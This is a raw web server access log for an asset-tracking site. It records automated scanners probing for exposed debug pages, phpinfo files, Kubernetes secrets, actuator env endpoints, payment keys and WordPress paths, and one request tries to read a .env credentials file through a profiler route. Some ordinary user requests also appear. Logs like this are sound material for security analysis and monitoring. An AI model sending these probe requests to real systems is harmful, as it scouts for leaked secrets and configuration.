[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:07 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:14 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
[15/Feb/2026:00:19:21 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
[15/Feb/2026:00:19:22 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
[15/Feb/2026:00:19:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v1/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v2/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/stripe" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/keys" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/payment/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/dashboard" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_ignition/health-check" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/horizon/api/stats" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/latest" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/open?file=.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_wdt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:00:21:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:00:34:07 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-"
[15/Feb/2026:00:34:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-"
[15/Feb/2026:00:34:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-"
[15/Feb/2026:00:34:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-"
[15/Feb/2026:00:34:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 81.29.142.100] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-"
[15/Feb/2026:00:34:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 81.29.142.100] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-"
[15/Feb/2026:00:34:19 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" "-"
[15/Feb/2026:00:34:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "-"
[15/Feb/2026:00:34:33 +0000] - - 400 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 654] [Gzip -] [Sent-to ] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 YaBrowser/21.5.1.355 Yowser/2.5 Safari/537.36" "-"
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:01:46:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:01:46:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:01:46:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:01:46:06 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 474] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:01:55:41 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 2.58.56.62] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[15/Feb/2026:01:55:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 2.58.56.62] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
